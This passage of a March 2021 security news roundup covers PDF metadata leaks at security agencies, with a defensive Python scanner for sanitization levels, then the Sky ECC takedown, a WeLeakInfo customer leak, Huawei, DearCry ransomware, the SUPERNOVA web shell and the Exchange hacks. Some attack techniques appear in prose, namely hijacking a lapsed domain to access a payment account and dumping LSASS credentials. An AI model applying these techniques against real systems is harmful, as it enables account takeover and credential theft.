The files also leaked email addresses – including official ones – (in 52 files), hardware brand (581 files), and paths (1,814 PDFs).
“During our analysis we observed that many agencies include more than one author publishing the PDF files. It is possible to download all the PDF files published on a security agency’s website and observe the author habits, OS trends,” the researchers note.
The analysis also allowed for the identification of 159 employees at 19 agencies who had not updated their tools over a period of two years, something threat actors could abuse in targeted attacks, especially since nearly half of the PDF files leaked operating system data.
While 9,509 (24%) of the analyzed PDF files have been sanitized before publishing, only 3,313 (8%) were sanitized with Level-3. The researchers note that only 3 agencies out of 7 that appear to care about sanitization are doing it properly.
“The issue is that popular PDF producer tools are keeping metadata by default with many other information while creating a PDF file. They provide no option for sanitization or it can only be achieved by following a complex procedure. Software producing PDF files need to enforce sanitization by default. The user should be able to add metadata only as an option,” the academics conclude.
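The checks the researchers describe can be run offline against raw file bytes, which is how a publisher would verify its own output before a file goes on a public site. The following is an added example written for this page, not the researchers' tooling: it scans a PDF for Info-dictionary keys, the XMP duplicates of those keys that a "surface" scrub of /Info leaves behind, and the other hidden-object classes from the NSA list, then maps the result onto a simplified reading of the paper's Level-0 to Level-3 scale (that mapping and the OS heuristic are this example's assumptions, not the paper's exact rules). The three sample PDFs are constructed inline and omit the xref table, so they exercise the scanner but are not viewer-grade files.

```python
"""Scan raw PDF bytes for the hidden data the Grenoble/Inria study measured.

Added example, not the researchers' code. Standard library only; sample PDFs are
constructed below. Level mapping is a simplified reading of the paper's scale.
"""
import re
from typing import Any, Dict, Optional

# Trailer /Info keys that name a person, a tool or (indirectly) an OS.
INFO_KEYS = ("Author", "Creator", "Producer", "Title", "Subject",
             "Keywords", "CreationDate", "ModDate")
IDENTIFYING = ("Author", "Creator", "Producer")

# XMP elements duplicating /Info; blanking only /Info leaves these behind.
XMP_PATTERNS = {
    "xmp:CreatorTool": rb"<xmp:CreatorTool>([^<]*)</xmp:CreatorTool>",
    "pdf:Producer":    rb"<pdf:Producer>([^<]*)</pdf:Producer>",
    "dc:creator":      rb"<dc:creator>.*?<rdf:li>([^<]*)</rdf:li>",
}

# Other hidden-object classes from the NSA list, by their PDF marker names.
OBJECT_PATTERNS = {
    "xmp_metadata_stream": rb"/Type\s*/Metadata",
    "annotation":          rb"/Type\s*/Annot",
    "embedded_file":       rb"/Type\s*/EmbeddedFile",
    "javascript":          rb"/S\s*/JavaScript",
    "optional_content":    rb"/OCProperties",
    "form_data":           rb"/AcroForm",
}


def scan_pdf(pdf: bytes) -> Dict[str, Any]:
    """Report what an outsider can read from the file without rendering it."""
    report: Dict[str, Any] = {"info": {}, "xmp": {}, "objects": {}}
    for key in INFO_KEYS:
        # Literal-string values only, e.g. /Author (jsmith); hex strings are skipped.
        m = re.search(rb"/" + key.encode() + rb"\s*\(([^)]*)\)", pdf)
        if m and m.group(1).strip():
            report["info"][key] = m.group(1).decode("latin-1")
    for name, pat in XMP_PATTERNS.items():
        m = re.search(pat, pdf, re.S)
        if m and m.group(1).strip():
            report["xmp"][name] = m.group(1).decode("utf-8", "replace")
    for name, pat in OBJECT_PATTERNS.items():
        hits = len(re.findall(pat, pdf))
        if hits:
            report["objects"][name] = hits
    return report


def sanitization_level(report: Dict[str, Any]) -> int:
    """0 = full metadata, 1 = partial metadata (incl. XMP leftovers),
    2 = no metadata but hidden objects remain, 3 = nothing recoverable."""
    if all(k in report["info"] for k in IDENTIFYING):
        return 0
    if report["info"] or report["xmp"]:
        return 1
    return 2 if report["objects"] else 3


def platform_hint(report: Dict[str, Any]) -> str:
    """Heuristic OS guess from tool strings (assumed substrings; real files vary)."""
    text = " ".join(list(report["info"].values()) + list(report["xmp"].values()))
    if any(s in text for s in ("Quartz PDFContext", "(Macintosh)", "Mac OS X", "macOS")):
        return "macOS"
    if "(Windows)" in text or "Microsoft" in text:
        return "Windows (likely)"
    return "unknown"


def build_pdf(info: Dict[str, str], xmp_creator_tool: Optional[str] = None,
              annotation: bool = False) -> bytes:
    """Constructed minimal PDF for the demo (no xref table, so not viewer-grade)."""
    meta_ref = b" /Metadata 4 0 R" if xmp_creator_tool is not None else b""
    annot_ref = b" /Annots [5 0 R]" if annotation else b""
    objs = [b"<< /Type /Catalog /Pages 2 0 R" + meta_ref + b" >>",
            b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            b"<< /Type /Page /Parent 2 0 R" + annot_ref + b" >>"]
    if xmp_creator_tool is not None:
        xmp = (b'<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF><rdf:Description>'
               b"<xmp:CreatorTool>" + xmp_creator_tool.encode("utf-8") +
               b"</xmp:CreatorTool></rdf:Description></rdf:RDF></x:xmpmeta>")
        objs.append(b"<< /Type /Metadata /Subtype /XML /Length %d >>\nstream\n"
                    % len(xmp) + xmp + b"\nendstream")
    else:
        objs.append(b"null")  # keeps object 5 reserved for the annotation
    if annotation:
        objs.append(b"<< /Type /Annot /Subtype /Text "
                    b"/Contents (reviewer note: confirm figures with J. Smith) >>")
    body = b"%PDF-1.7\n"
    for num, obj in enumerate(objs, 1):
        body += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    info_dict = b"".join(b"/%s (%s) " % (k.encode("latin-1"), v.encode("latin-1"))
                         for k, v in info.items())
    return body + b"trailer\n<< /Root 1 0 R /Info << " + info_dict + b">> >>\n%%EOF\n"


# Constructed samples: a fresh export, the same file after a scrub that only
# blanked /Info, and a properly cleaned file.
TOOL = "Microsoft\u00ae Word 2010"
FULL_PDF = build_pdf({"Author": "jsmith", "Creator": TOOL, "Producer": TOOL,
                      "CreationDate": "D:20190214101500+01'00'"},
                     xmp_creator_tool=TOOL, annotation=True)
SURFACE_SCRUBBED_PDF = build_pdf({"Author": "", "Creator": "", "Producer": ""},
                                 xmp_creator_tool=TOOL, annotation=True)
CLEAN_PDF = build_pdf({})

if __name__ == "__main__":
    for label, pdf in (("full", FULL_PDF), ("surface-scrubbed", SURFACE_SCRUBBED_PDF),
                       ("clean", CLEAN_PDF)):
        r = scan_pdf(pdf)
        print(f"{label:17} level={sanitization_level(r)} os={platform_hint(r)} {r}")
```

The surface-scrubbed sample is the case the paper flags: its /Info strings are empty, yet the XMP stream still names the authoring tool and a reviewer annotation still names a colleague, so it scores Level-1, not Level-3. A publishing check that stops at the Info dictionary would pass it.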
US Indicts Head of Alleged Crime Chat Comms Service
15.3.2021 BigBrothers Securityweek
The CEO of a Canada-based company that provides encrypted communications and a former associate have been indicted in the US on charges of facilitating international drug trafficking, the Justice Department said.
The indictment, returned Friday, names Jean-Francois Eap, the head of Sky Global, and Thomas Herdman, a former high-level distributor of Sky Global devices, the department said.
Warrants have been issued for the arrest of the two men.
"The indictment alleges that Sky Global generated hundreds of millions of dollars providing a service that allowed criminal networks around the world to hide their international drug trafficking activity from law enforcement," said Acting US Attorney Randy Grossman.
"Sky Global’s devices are specifically designed to prevent law enforcement from actively monitoring the communications between members of transnational criminal organizations involved in drug trafficking and money laundering," the indictment alleges.
It said there are at least 70,000 Sky Global devices in use around the world.
The indictment comes after police in Europe said Wednesday they had arrested at least 80 people and carried out hundreds of raids in two countries after shutting down the Sky ECC encrypted phone network -- Sky Global's actual product -- used by organized crime groups.
Belgian, Dutch and French police said they hacked into the Sky ECC network, allowing them to look "over the shoulders" of suspects as they communicated with customized devices to plot drug deals and murders.
In France, law officials identified some 2,000 users of Sky ECC "allowing for procedures to be opened relating to large-scale drug operations and attacks on people," the Paris prosecutor said.
"The network we are dealing with seems to be almost exclusively used by large-scale criminals."
Despite Hacks, US Not Seeking Widened Domestic Surveillance
15.3.2021 BigBrothers Securityweek
The Biden administration is not planning to step up government surveillance of the U.S. internet even as state-backed foreign hackers and cybercriminals increasingly use it to evade detection, a senior administration official said Friday.
The official said the administration, mindful of the privacy and civil liberties implications that could arise, is not currently seeking additional authority to monitor U.S.-based networks. Instead, the administration will focus on tighter partnerships and improved information-sharing with the private-sector companies that already have broad visibility into the domestic internet, said the official, who spoke to reporters on condition of anonymity.
The comment was an acknowledgement of the fraught political debate surrounding domestic government surveillance — nearly eight years after former National Security Agency contractor Edward Snowden triggered a scandal with leaked agency documents — and a recognition of the challenges in balancing the growing cyber defense imperative against privacy concerns that come with stepped-up monitoring.
Foreign state hackers are increasingly using U.S.-based virtual private networks, or VPNs, to evade detection by U.S. intelligence agencies, who are legally constrained from monitoring domestic infrastructure.
In the crucial second stage of the SolarWinds hacking campaign, for instance, the suspected Russian intelligence operatives used U.S.-based VPNs to siphon off data through backdoors in victims’ networks, establishing an account that made it seem like they were in the U.S.
That hack detected in December compromised at least nine federal agencies, and exposed “significant gaps in modernization and in technology of cybersecurity across the federal government,” the official said. Dozens of private-sector companies were also hit, the telecommunications and software sector most heavily.
The U.S. is also addressing a separate, far more widespread and indiscriminate hack that cyber sleuths blame on China and which became a global crisis last week.
It has exposed tens of thousands of servers running Microsoft’s Exchange email program to intrusion. Though Microsoft has patched the vulnerability, affected server owners had only a “short window” to get vulnerable servers fixed, the official said. Criminal and state-backed hackers seeking to exploit the underlying flaw are apt to cause more havoc, the administration says.
The official said President Joe Biden has been briefed on the incident, and private-sector cybersecurity sleuths were brought in to confer with White House officials on a response.
When it comes to the pursuit of new surveillance or monitoring authorities, the official described the administration’s posture as “not yet, not now.” The official said the administration is committed at the moment to improving the flow of information with cloud providers and private companies who have good visibility into U.S. networks but aren’t bound by the same government constraints.
Predictions from the cybersecurity community were proving correct, meanwhile, that ransomware attacks leveraging compromised Exchange servers would be inevitable given the scope of the hack.
Microsoft said it has detected a new family of ransomware, dubbed DearCry, exploiting the compromises. Ransomware expert Brett Callow of the cybersecurity firm Emsisoft said the website ID Ransomware had so far received six submissions of the malware — from victims in the United States, Australia, Austria, Canada and Denmark.
Microsoft said in a tweet that it was blocking the ransomware, but, said Callow, “That’ll not necessarily stop attacks.” Antivirus products detect and block a lot of known ransomware, but hackers often disable those products prior to deployment, he said.
The global ransomware scourge — primarily the work of Russian-speaking and North Korean cybercriminals — has cost businesses, local governments, health care providers and even K-12 school districts tens of billions of dollars in the past few years.
Europol Credits Sweeping Arrests to Cracked Sky ECC Comms
13.3.2021 BigBrothers Threatpost
Sky ECC claims that cops cracked a fake version of the app being passed off by disgruntled reseller.
Europol launched “major interventions” against organized crime on March 9, which it said were made possible by monitoring the encrypted messages of around 70,000 users of the Sky ECC service since mid-February.
Sky ECC, which focuses on selling mobile phones with specialized, private communications, denies that the messages on its platform were decrypted. However, sweeping arrests across Belgium, France and the Netherlands reported by Europol, in coordination with those countries’ law-enforcement authorities, seem to indicate otherwise. And Europol said it’s not done with the collected data, which it hopes will lead to additional actions and prosecutions.
Europol said Sky ECC has about 170,000 users who send around 3 million messages every day, adding that 20 percent of those users are in Belgium and the Netherlands.
“By successfully unlocking the encryption of Sky ECC, the information acquired will provide insights into criminal activities in various E.U. Member States and beyond, and will assist in expanding investigations and solving serious and cross-border organized crime for the coming months, possibly years,” Europol said in its announcement.
This latest operation follows the EncroChat bust from last July, when the U.K.’s National Crime Agency seized the service’s servers and broke up organized-crime activities being conducted across encrypted messages — including money laundering, where to hide drugs and even murder. More than 700 arrests were made in that bust, and the remaining customers moved over to Sky ECC, Europol said.
This month’s crackdown began in Belgium, Europol explained, when police seized devices from suspects who were found to be using Sky ECC to organize and communicate.
In Belgium alone, the operations involved more than 1,600 Belgian police officers, some escorted by special forces, and raids on 200 individual residences.
Dutch police reported that they conducted 75 home raids, arrested 30 suspects and seized millions in cash, eight cars, weapons, cash machines and police uniforms.
A statement from Dutch law enforcement from March 9 said the operation it called “Argus” included the seizure of Sky ECC servers.
Sky ECC Denies Messages Were Decrypted
Sky ECC refutes that messages were breached, posting a notice on its homepage saying, “Dutch police confirms that they are investigating a fake Sky ECC phone,” the company said. “This phone was developed by someone who has been passing themselves off as an official reseller for some years.”
What Sky ECC said is an imposter phone.
The reseller is called SKYECC.EU, and Sky ECC provided photos of the phone seized by Dutch authorities, for comparison to an authentic Sky ECC phone.
“This ‘E.U.’ phone is not one of ours and is not sold by us,” says Jean-François Eap, CEO of Sky ECC. “We know that someone has been passing themselves off as an official reseller of Sky ECC for some time, and we have been trying to shut it down through legal channels for almost two years.”
Europol and Sky ECC have not responded to Threatpost’s requests for additional comment.
A real Sky ECC device.
Sky ECC advertises that it is so confident in its security that it offers a $5 million prize for anyone who can break in. It also denied that any of the law enforcement agencies behind this recent roundup have asked for the payout.
“The Belgian police’s claim that they sent bank-accounts details to Sky ECC to claim our ‘5 Million Dollar Hack’ prize is entirely false,” Eap added.
“Sky ECC has not been contacted by any authorities in connection with any investigations currently being reported,” Eap said. “The confusing references to Sky ECC instead of SKYECC.EU are very damaging. If authorities have based any assessment of Sky ECC on account of SKYECC.EU, they are severely mistaken about the nature of Sky ECC and its operations.”
Eap added the company is actively working on the problem.
“We are gathering as much information as quickly as we can in order to provide accurate information to the public, the media, and the authorities alike,” he explained. “We hope that by remaining clear and transparent, we provide a foil to the sensationalist reporting and claims made over the past 2 days.”
Are Private Communications Extinct?
Until more evidence surfaces, Brandon Hoffman, CISO at Netenrich, told Threatpost there’s no way to really know what happened beyond the facts that arrests were made and that Sky ECC is still operational.
“On one hand, it’s hard to believe an organization like Europol would make a false claim or an overblown claim, yet that could be tactic used by them to push criminals into a less secure platform or one they have more hooks into,” Hoffman said. “On the other hand, the operators of Sky ECC would be facing the collapse of their entire business model if they had this issue, and it stands to reason they have done everything in their power to ensure the messaging remains secure.”
The question is, how many Sky ECC customers are willing to gamble on whether Europol is bluffing? Or, will many just move on to another encrypted messaging service, similarly to when they migrated from EncroChat last summer?
Tim Wade, who works at Vectra hunting cyberattackers, told Threatpost that law enforcement’s seizure or intercepting of private communications, for any purpose, should be viewed as a dangerous infringement on basic rights.
“Private communication is essential for free and fair societies,” Wade said. “Sidestepping the validity of the claims about compromising Sky ECC, it’s critical that we recognize that criminals misusing encryption is a price worth paying to promote individual privacy, and enjoy the benefits that such privacy provides to our culture.”
10,000+ WeLeakInfo customer records leaked
13.3.2021 BigBrothers Securityaffairs
An actor claimed to have registered one of WeLeakInfo’s former domains, accessed the details of 10,000+ WeLeakInfo customers, and leaked them.
WeLeakInfo.com was a data breach notification service that allowed its customers to check whether their credentials had been compromised in data breaches. The service claimed a database of over 12 billion records from over 10,000 data breaches. In early 2020, a joint operation conducted by the FBI in coordination with the UK NCA, the Netherlands National Police Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland resulted in the seizure of the WeLeakInfo.com domain.
After the seizure of the service in January, two men, one in the Netherlands and another in Northern Ireland, were arrested.
In January 2021, the NCA arrested 21 people in the UK as part of an operation targeting customers of the WeLeakInfo service, which advertised stolen personal credentials.
Data breach notification services of this kind are a profitable business: visitors pay a fee to access data exposed in past breaches. Subscriptions ranged from a $2 trial to a $70 three-month unlimited-access account and allowed users to search for any data in the archive managed by the operators.
This is quite different from services that only alert individuals when their data are exposed in a data breach and that for this reason are considered legal.
Data breach notification services like WeLeakInfo are a gold mine for threat actors, who can gather information on their targets before launching an attack.
Security experts from Cyble noticed that a member of a hacking forum claimed to have registered one of WeLeakInfo’s domains, wli.design, which had lapsed and was re-registered on March 11, 2021.
The actor then created an email address on that domain, the same domain the operators had used for their account with the payment service Stripe, and used it to gain access to that account. Access to the Stripe account exposed customer details, including email, address, partial card details, and purchase history.
“The WeLeakInfo operators allegedly used the domain’s email address for payments via Stripe, the actor claimed. The actor claimed to have registered the domain and then created an email address on the registered domain used in their Stripe account gaining access to WeLeakInfo customers’ details.” reads the post published by Cyble.
“Upon access to WeLeakInfo’s Stripe account, the actor allegedly gained access to their customers’ details (including email, address, partial card details, purchase history and others).”
One of the files leaked by the actor, named “top_customers.csv,” includes a total of 100 personal and “maybe professional” email addresses, while another file includes buyers’ addresses and partial details of their credit cards.
Huawei Listed Anew as Threat to US National Security
13.3.2021 BigBrothers Securityweek
US regulators on Friday listed Huawei among Chinese telecom gear firms deemed a threat to national security, signaling that a hoped for softening of relations is not in the cards.
A roster of communications companies thought to pose "an unacceptable risk" to national security included Huawei Technologies; ZTE; Hytera Communications; Hangzhou Hikvision Digital Technology, and Dahua Technology.
"This list is a big step toward restoring trust in our communications networks," said Federal Communications Commission acting chairwoman Jessica Rosenworcel.
"This list provides meaningful guidance that will ensure that as next-generation networks are built across the country, they do not repeat the mistakes of the past or use equipment or services that will pose a threat to US national security or the security and safety of Americans."
The five Chinese companies that provide communications equipment or services were on a roster compiled by the FCC and the Homeland Security Bureau as per US law.
Huawei chief and founder Ren Zhengfei last month called for a reset with the United States under President Joe Biden, after the firm was battered by sanctions imposed by Donald Trump's administration.
In his first appearance before journalists in a year, Ren Zhengfei said his "confidence in Huawei's ability to survive has grown" despite its travails across much of the western world where it is maligned as a potential security threat.
The comments came as the firm struggled under rules that have effectively banned US firms from selling it technology such as semiconductors and other critical components, citing national security concerns.
Insisting that Huawei remained strong and ready to buy from US companies, Ren called on the Biden White House for a "mutually beneficial" change of tack that could restore its access to the goods.
Continuing to do so, he warned, would hurt US suppliers.
Founded by Ren in 1987, Huawei largely flew under the global radar for decades as it became the world's largest maker of telecoms equipment and a top mobile phone producer.
That changed under former president Donald Trump, who targeted the firm as part of an intensifying China-US trade and technology standoff.
Trump from 2018 imposed escalating sanctions to cut off Huawei's access to components and bar it from the US market, while he also successfully pressured allies to shun the firm's gear in their telecoms systems.
Ren also has had to deal with the December 2018 arrest of his daughter, Huawei executive Meng Wanzhou, on a US warrant during a Vancouver stopover.
Meng, 49, faces fraud and conspiracy charges in the United States over alleged Huawei violations of US sanctions against Iran, and separate charges of theft of trade secrets.
US Moves Closer to Retaliation Over Hacking as Cyber Woes Grow
13.3.2021 BigBrothers Securityweek
A senior US official said Friday the Biden administration is close to a decision on retaliation for state-sponsored hacking as fears grew over the fallout from the latest of two major cyberattacks.
The official said the White House was working closely with the private sector to ramp up cyber defenses following the attacks which targeted Microsoft Exchange servers and SolarWinds security software, potentially compromising thousands of government and private computer networks.
US officials had previously hinted at moves against Russia, which has been linked to the massive SolarWinds hack that shook the government and corporate security last year. The latest comments suggested forthcoming actions.
"You can expect further announcements on that in weeks, not months," the senior official said, in reference to SolarWinds, in a briefing with reporters on the two hacking incidents.
The official, who asked not to be identified, said federal agencies had made progress in patching systems at nine federal agencies affected by the SolarWinds attack.
But an urgent effort is underway to remedy the Microsoft Exchange hack, which opened security holes that are actively being exploited by cybercriminals and others.
To help find solutions, "for the first time we've invited private sector companies to participate" in key national security meetings on the attacks, the official said.
The response "is still evolving," according to the official, who noted: "We really have a short window to get vulnerable servers patched, measured in hours, not days."
- New ransomware emerges -
The comments came as a new strain of ransomware has emerged which exploits a security flaw in Microsoft Exchange servers, signaling potentially damaging consequences from the high-profile hack.
Microsoft and other security researchers said the new ransomware dubbed "DearCry" was showing up in servers affected by the breach attributed to a Chinese hacker group.
"We have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers," said a tweet from Microsoft Security Intelligence.
Other researchers including Michael Gillespie, founder of the ID Ransomware service, noted the new strain of malware on Thursday, which could lead to a new wave of attacks that encrypt computer systems and seek to extract payments from operators.
This is the latest sign that the security flaw which became public this month could open the door to a variety of hackers, cybercriminals and cyberespionage operators.
"While patching to prevent compromises will be easy, remediating any systems that have already been compromised will not," said Brett Callow of the security firm Emsisoft.
"At this point, it's absolutely critical that governments quickly come up with a strategy to help organizations secure their Exchange servers and remediate any compromises before an already bad situation becomes even worse."
Earlier this week the FBI and Department of Homeland Security warned that the Exchange server vulnerability may be exploited for nefarious purposes.
A joint statement by the agencies said that "adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack."
The DHS Cybersecurity and Infrastructure Security Agency has been pressing for patches to be applied to networks in both government and the private sector.
The potentially devastating hack is believed to have affected at least 30,000 Microsoft email servers in government and private networks and has prompted calls for a firm response to state-sponsored attacks which could involve "hacking back" or other measures.
Internet disruption in Russia coincided with the introduction of restrictions
13.3.2021 BigBrothers Securityaffairs
Experts at the NetBlocks Internet Observatory observed this week a temporary disruption of internet service in Russia due to new restrictions.
On Wednesday 10 March 2021, network data from the NetBlocks Internet Observatory showed a disruption of the internet service provided by the Russian operator Rostelecom.
The partial disruption of the service coincided with the announcement of new restrictions by the telecoms watchdog Roskomnadzor.
Multiple operators were affected by the activity, with mobile networks hit hardest.
“The incident comes as Russian internet regulatory body Roskomnadzor announces protective measures to slow, or throttle, access to Twitter services citing an alleged failure by the company to remove harmful content over extended periods of time.” states the report published by Netblocks.
The link between the new restrictions and the disruption of internet services has yet to be demonstrated.
Proposed Bill Would Allow Americans to Sue Foreign Cyber-Actors
11.3.2021 BigBrothers Securityweek
A bill introduced in the House of Representatives this week could allow United States citizens to seek monetary damages if cyber-attacks by foreign threat actors harm them in any way.
Referred to as the Homeland and Cyber Threat Act, or the HACT Act, the legislation is the reintroduced version of a bill initially introduced in August 2019.
The bill was reintroduced by Reps. Jack Bergman (MI-01), Colin Allred (TX-32), Brian Fitzpatrick (PA-01), Jaime Herrera Beutler (WA-03), Joe Neguse (CO-02), and Andy Kim (NJ-03).
Per the bill, Americans would be able to make claims in federal or state courts if they are in any way affected by cyber-attacks that foreign states have conducted against them.
The HACT Act seeks to eliminate the immunity of foreign states, officials, and government employees, in courts in the United States, when Americans seek money damages against a foreign state “for personal injury, harm to reputation, or damage to or loss of property,” the bill reads.
Activities the legislation refers to include unauthorized access to a computer in the United States or to confidential, electronic information stored in the country, as well as the use of malware or other harmful applications to infect computers in the United States.
The bill also seeks to cover the unauthorized use or leak of information stolen from those activities and the provisioning of material support for threat actors who engage in those types of activities, including by officials of foreign states.
“Cyberattacks against American citizens are only increasing and Congress should give Americans the tools they need to fight back against foreign attacks. This legislation does just that by giving Americans the ability to hold foreign governments accountable for damage done by cyberattacks,” Rep. Allred commented.
Latest Mass Hacks Highlight Challenge for Biden Administration
11.3.2021 BigBrothers Securityweek
The potentially devastating hack of Microsoft email servers, the second major cyberattack in months, adds pressure to the Biden administration as it weighs options for "hacking back" or other moves to protect cyberspace.
Security analysts say stronger actions are needed to deter the attacks which exploited vulnerabilities in corporate and government networks and opened opportunities for espionage and cybercrime.
The latest hack exploiting flaws in Microsoft Exchange service is believed to have affected at least 30,000 US organizations including local governments and was attributed to an "unusually aggressive" Chinese cyberespionage campaign.
The news comes on the heels of revelations that Russia was probably behind the massive SolarWinds hack that shook the government and corporate security last year.
"These are two very big incidents and represent a significant litmus test for the early stages of the Biden administration," said Frank Cilluffo, a former homeland security adviser in the George W. Bush administration who is now the director of Auburn University's McCrary Institute for Cyber and Critical Infrastructure Security.
"A response is important because it sets a precedent and sets the tone for the administration's response to unacceptable cyber behavior."
Cilluffo added that any action would not simply respond to the perpetrators, noting that "everyone else is watching, and other state and nonstate actors are going to pay attention to our ability to respond."
James Lewis, a cybersecurity specialist with the Center for Strategic and International Studies, said the two incidents suggest "that our cybersecurity strategy isn't working against our most skilled and dangerous opponents."
"This means that the espionage advantages are endless," Lewis said. "The Biden team understands this and is trying to change things, but we are far from having a solution."
- Hacking back? -
Until recently, the notion of "hacking back" counterstrikes was considered too politically risky under international norms. But a 2019 agreement among 28 countries set a legal framework for such retaliation, Lewis noted.
"Hacking back by private entities is still illegal, but the case has been made that it is legal for a state to do so in response to an attack," he said.
R. David Edelman, a former digital security adviser to the Obama administration who is now on the faculty at the Massachusetts Institute of Technology, said the new administration faces difficult choices.
"The administration has said it wants to impose costs -- and it’s unclear what costs are commensurate. Just like with SolarWinds, the private sector is going to have to pay for another state's adventurism," Edelman said.
"Indictments? Sanctions? They only have so much effect when we're talking about agents safely ensconced in a foreign security state thousands of miles away."
- 'Surgical' response -
Microsoft said a state-sponsored hacking group operating out of China is exploiting previously unknown security flaws in its Exchange email services to steal data from business users.
The hacking group, which it has named "Hafnium," is a "highly skilled and sophisticated actor," according to the company.
This comes following revelations that hackers managed to compromise and install malware in a piece of security software developed by SolarWinds which is used for management and supervision of networks at many large companies and several US government agencies.
The attack was discovered by cybersecurity company FireEye, which, along with SolarWinds, has pointed the finger at hackers linked to the Russian government.
Last month, Anne Neuberger, the senior White House cybersecurity advisor, said her team was looking "holistically" at retaliation.
"This isn't the only case of malicious cyber activity of likely Russian origin, either for us or for our allies and partners," she said.
Cilluffo said any response must be carefully crafted, like any military action, to punish the intended targets without harming innocent bystanders. That could mean economic, diplomatic or military measures, he said.
"This can't be treated as a cyber incident alone," he said. "It has to be woven into the broader geopolitical and national security machinery of the US government."
This could mean different kinds of responses for Russia, China, North Korea or others believed to be supporting hacker activity.
"A computer network attack is clearly an instrument in our toolbox," he said.
"But we want to do it surgically, discriminately and obviously have impact on those we want to have impact on."
SUPERNOVA backdoor that emerged after SolarWinds hack is likely linked to Chinese actors
10.3.2021 BigBrothers Securityaffairs
Supernova malware clues link Chinese threat group Spiral to SolarWinds server hacks
Supernova malware spotted on compromised SolarWinds Orion installs exposed on the Internet is likely linked to a China-linked espionage group.
Researchers at Secureworks’ Counter Threat Unit (CTU) were investigating the exploitation of SolarWinds servers to deploy the Supernova web shell when they collected evidence linking the malicious activity to a China-linked cyber espionage group tracked as Spiral.
The attackers were observed exploiting the CVE-2020-10148 authentication bypass issue in the SolarWinds Orion API to remotely execute API commands.
Once the attackers had exploited the issue on a vulnerable server, they deployed the Supernova web shell to disk using a PowerShell command.
“In late 2020, Secureworks® Counter Threat Unit™ (CTU) researchers observed a threat actor exploiting an internet-facing SolarWinds server to deploy the SUPERNOVA web shell. Additional analysis revealed similarities to intrusion activity identified on the same network earlier in 2020, suggesting the two intrusions are linked.” reads the analysis published by Secureworks. “CTU™ researchers attribute the intrusions to the SPIRAL threat group. Characteristics of the activity suggest the group is based in China.”
In December, shortly after the initial disclosure of the SolarWinds attack, several teams of researchers mentioned the existence of two second-stage payloads.
Security experts from Symantec, Palo Alto Networks, and Guidepoint reported that threat actors behind the SolarWinds attack were also planting a .NET web shell dubbed Supernova.
Researchers from Palo Alto Networks revealed that the malicious code is a tainted version of the legitimate .NET library “app_web_logoimagehandler.ashx.b6031896.dll” included in the SolarWinds Orion software.
According to Secureworks, Supernova was used by the threat actors for reconnaissance, to harvest credentials, and to exfiltrate data from the compromised systems.
Secureworks experts found similarities with previous intrusion activity: the analysis of an incident earlier in 2020 revealed that the threat actor initially gained access to the target network as early as 2018 by exploiting a vulnerable public-facing ManageEngine ServiceDesk server. The attacker leveraged that access to periodically harvest and exfiltrate domain credentials. In August 2020, the attackers used the same access to harvest credentials from two servers, then used them to access files from Office 365-hosted SharePoint and OneDrive services.
In both intrusions the attackers used identical commands to dump the LSASS process via comsvcs.dll with the same output file path, accessed the same servers, and used the same three compromised administrator accounts.
“CTU researchers have associated Chinese threat groups with network intrusions involving the targeting of ManageEngine servers, maintenance of long-term access to periodically harvest credentials and exfiltrate data, and espionage or theft of intellectual property,” states the analysis. “Although SPIRAL activity shares these characteristics, the characteristics are insufficient for attributing SPIRAL’s country of origin. However, an additional characteristic of the August 2020 intrusion strengthens the Chinese connection.”
Note that the above intrusions are not linked to the SolarWinds supply chain attack. It is important to highlight that the intrusion investigated by Secureworks was not caused by exploitation of the SolarWinds supply chain; instead, the attackers were able to add Supernova to the Orion software on the server they had compromised.
Supernova was not delivered through the SolarWinds updates.
FireEye CEO: Reckless Microsoft Hack Unusual for China
10.3.2021 BigBrothers Securityweek
Cyber sleuths have already blamed China for a hack that exposed tens of thousands of servers running its Exchange email program to potential hacks. The CEO of a prominent cybersecurity firm says it now seems clear China also unleashed an indiscriminate, automated second wave of hacking that opened the way for ransomware and other cyberattacks.
The second wave, which began Feb. 26, is highly uncharacteristic of Beijing’s elite cyber spies and far exceeds the norms of espionage, said Kevin Mandia of FireEye. In its massive scale it diverges radically from the highly targeted nature of the original hack, which was detected in January.
“You never want to see a modern nation like China that has an offense capability — that they usually control with discipline — suddenly hit potentially a hundred thousand systems,” Mandia said Tuesday in an interview with The Associated Press.
Mandia said his company assesses based on the forensics that two groups of Chinese state-backed hackers — in an explosion of automated seeding — installed backdoors known as “web shells” on an as-yet undetermined number of systems. Experts fear a large number could easily be exploited for second-stage infections of ransomware by criminals, who also use automation to identify and infect targets.
Across the globe, cybersecurity teams are scrambling to identify and shore up hacked systems. The National Governors Association sent a rare alert to governors on Tuesday asking them to amplify “both the severity of the threat and the next steps” local governments, businesses and operators of critical infrastructure should take.
David Kennedy, CEO of the cybersecurity firm TrustedSec, tweeted Tuesday that resource-demanding programs that “mine” cryptocurrencies were being installed on some compromised Exchange servers.
The White House has called the overall hack an “active threat,” but so far has not urged tough action against China or differentiated between the two waves — at least not publicly. Neither the White House nor the Department of Homeland Security offered immediate comment on whether they attribute the second wave to China.
The assessment of Mandia, who has been dealing with Chinese state-backed hackers since 1995 and has long had the ear of presidents and prime ministers, squares with that of Dmitri Alperovitch, former chief technical officer of CrowdStrike, the other cybersecurity powerhouse in the Washington, D.C., area. Alperovitch says China needs to be immediately put on notice: Shut down those web shell implants and limit collateral.
The explosion of automated backdoor-creating hacks began five days before Microsoft issued a patch for the vulnerabilities first detected in late January by the cybersecurity firm Volexity. It had found evidence of the vulnerabilities being used as far back as Jan. 3 by Chinese state-backed hackers, who researchers say targeted think tanks, universities, defense contractors, law firms and infectious-disease research centers.
Suddenly, all manner of organizations that run email servers were infected with web shells associated with known Chinese groups, who — knowing the patch was imminent — rushed to hit everything they could, said Mandia.
“They could sense it was going to end-of-life soon, so they just went wild. They machine gun-fired down the stretch,” he said in an interview in FireEye’s offices.
“It’s possible the second infection wave was not approved at the highest levels of China’s government,” Mandia said.
“This doesn’t feel consistent with what they normally do,” he said. “A lot of times there’s a disconnect between senior leadership and front-line folks. All I can tell you is it was surprising to me to see four ‘zero days’ wantonly exploited,” adding, “If you could be exploited by this act, for the most part, you were.”
